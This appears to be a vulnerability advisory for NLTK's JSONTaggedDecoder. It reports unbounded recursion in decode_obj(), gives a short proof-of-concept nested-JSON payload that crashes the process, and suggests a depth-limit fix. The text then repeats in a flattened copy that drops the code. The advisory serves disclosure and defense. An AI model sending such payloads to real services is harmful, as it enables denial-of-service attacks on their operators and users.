Summary
JSONTaggedDecoder.decode_obj() in nltk/jsontags.py calls itself
recursively without any depth limit. A deeply nested JSON structure
exceeding sys.getrecursionlimit() (default: 1000) will raise an
unhandled RecursionError, crashing the Python process.
Affected code
File: nltk/jsontags.py, lines 47–52
@classmethod
def decode_obj(cls, obj):
if isinstance(obj, dict):
obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
elif isinstance(obj, list):
obj = list(cls.decode_obj(val) for val in obj)
Proof of Concept
import sys, json
from nltk.jsontags import JSONTaggedDecoder
depth = sys.getrecursionlimit() + 50 # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth
# Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)
Impact
Any code path that passes externally-supplied JSON to
JSONTaggedDecoder is vulnerable to denial of service.
The severity depends on whether such a path exists in the
calling code (e.g. nltk/data.py).
Suggested Fix
Add a depth parameter with a hard limit:
@classmethod
def decode_obj(cls, obj, _depth=0):
if _depth > 100:
raise ValueError("JSON nesting too deep")
if isinstance(obj, dict):
obj = {key: cls.decode_obj(val, _depth + 1)
for (key, val) in obj.items()}
elif isinstance(obj, list):
obj = list(cls.decode_obj(val, _depth + 1) for val in obj)
References
Summary
JSONTaggedDecoder.decode_obj()innltk/jsontags.pycalls itselfrecursively without any depth limit. A deeply nested JSON structure
exceeding
sys.getrecursionlimit()(default: 1000) will raise anunhandled
RecursionError, crashing the Python process.Affected code
File:
nltk/jsontags.py, lines 47–52Proof of Concept
Impact
Any code path that passes externally-supplied JSON to
JSONTaggedDecoderis vulnerable to denial of service.The severity depends on whether such a path exists in the
calling code (e.g.
nltk/data.py).Suggested Fix
Add a depth parameter with a hard limit:
References